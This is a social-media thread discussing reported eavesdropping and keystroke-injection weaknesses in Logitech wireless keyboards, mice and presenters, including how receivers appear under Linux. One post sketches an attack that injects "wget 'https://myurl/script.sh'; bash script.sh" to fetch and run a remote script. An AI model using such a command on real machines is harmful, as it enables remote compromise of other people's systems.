Wireless keyboards and mice vulnerable to eavesdropping and remote attacks.

(notice lack of "Logitech")

@Wolf480pl @fribbledom true, this isn't exactly news.

Maybe "*even* Logitech wireless HID are susceptible to eavesdropping and remote attacks"?

One word changes the meaning a lot, I think.

@RandomDamage @Wolf480pl

I still consider it news. The wireless connection is _supposed_ to be properly encrypted, after all. And until today most everyone was under the impression it is - at least when it comes to Logitech devices.

@fribbledom @RandomDamage
I've seen news of wireless keyboards with broken encryption several years ago.

Maybe it was just one vendor, but experience tells that any proprietary protocol that a vendor comes up with behind closed doors is very likely to be terribly broken. And wireless keyboards are supposed to be cheap, which only amplifies the effect.

In theory, it's possible to do it right, but the odds are so low...

@fribbledom @Wolf480pl it's at very minimum a useful reminder, so I'm really just slightly miffed with the headline writer for aiming low.

@fribbledom @RandomDamage @Wolf480pl I’ve *never* seen a Logi mouse encrypt squat. And the encryption used by any Logi keyboard I’ve owned is simplistic. Wireless devices are only secure within a Faraday cage, and those are nearly never used. Best to use wires unless you know what you’re doing or doing nothing useful or private at all.

@SuperFloppies @fribbledom @RandomDamage

I'd expect privacy leaks from a wireless mouse to be much less than from a wireless keyboard.

But then, there are also many other benefits to wired mice and keyboards. One of them is that you never need to replace batteries.

@Wolf480pl @SuperFloppies @fribbledom the trick is to hack the dongle and use it to sniff the bus (or even as a beach head into the system).

@RandomDamage @SuperFloppies @fribbledom

Can you sniff anything on USB other than your own traffic?

OTOH, if you could force a reconfiguration and add new interfaces to your device, like a keyboard and a mass storage, that could be plenty useful. But that requires an RCE on the dongle, and the dongle to have a powerful enough CPU that you can pull this off.

Sounds like effort.

@Wolf480pl @SuperFloppies @fribbledom deleted comment with link due to unexplained lag in posting.

Bad USB+ Rubber Duck HID and all bets are off. Just hope that Logitech (or whoever) remembers to guard against 3 year old exploits.

@fribbledom Shit. Guess I'm looking for a different mouse to get then.

@fribbledom All we have are these Logitech devices. LOL! There are no vulnerabilities! The problem is too vast and untenable. Everything is FIIIIIINE. **structural timbers on fire start to drop** ;)

@fribbledom If I only have a mouse, is it still possible to make it impersonate a keyboard?


You know that's a great question! I don't know the definitive answer, and could see arguments for both sides, but I'll boost your toot, in case someone else has more insight.

@mansr @fribbledom given that the exploit was shown working on a presenter device, which does not act as a keyboard and in fact has a filter in software to block any keystrokes sent

i would guess that it probably does

@mansr @fribbledom that's a good question and i don't know

however the article specifically mentions that there is a filter in place such that a device classified as a presenter should not be able to send letter keypresses, and this is bypassed in the exploit

@mansr @fribbledom With a lot of modern mice, yeah. My mouse shows up as a keyboard for the programmable functionality it has. Plus I'm pretty sure the Logitech dongles work for all their devices.

@mansr @fribbledom I am not sure, but probably yes. Logitech uses a single receiver for both keyboard and mouse.

@mansr @fribbledom The Logitech mouse I have (which isn't even one of the fancy ones) can send keyboard commands using the side keys, even without the drivers running

@mansr @fribbledom if the USB controller is programmable, definitely. If it's not you are limited to what it is already programmed to pass.

This might include full keyboard, if the manufacturer is saving money by having a single part instead of using a limited mouse dongle.

@fribbledom Under Linux, the "unifying receiver" shows up as multiple input devices: Keyboard, Mouse, Consumer Control, and System Control. The mouse device reports only motion and button events. If only the mouse device is used by applications, one would think they might be shielded from injected keypress events. Or if not, modifying the kernel driver to discard non-mouse input from the receiver should be easy enough.


Sure, that doesn't mean it can automatically be exploited by sending some magic command to the mouse, though.

You're right though, it should be fairly trivial to block it in the kernel.

@fribbledom @mansr this is really a complete no-brainer. They have no security at all. Just war drive around and wget 'https://myurl/script.sh'; bash script.sh or something similar. I always unplug these things immediately after using them.

This is why I never use wireless keyboards. Good old wires are far more reliable than any encryption scheme.
I remember reading a similar article on this - that wireless keyboards and mice are vulnerable. Though that article mentioned that Bluetooth keyboards and mice are not yet vulnerable.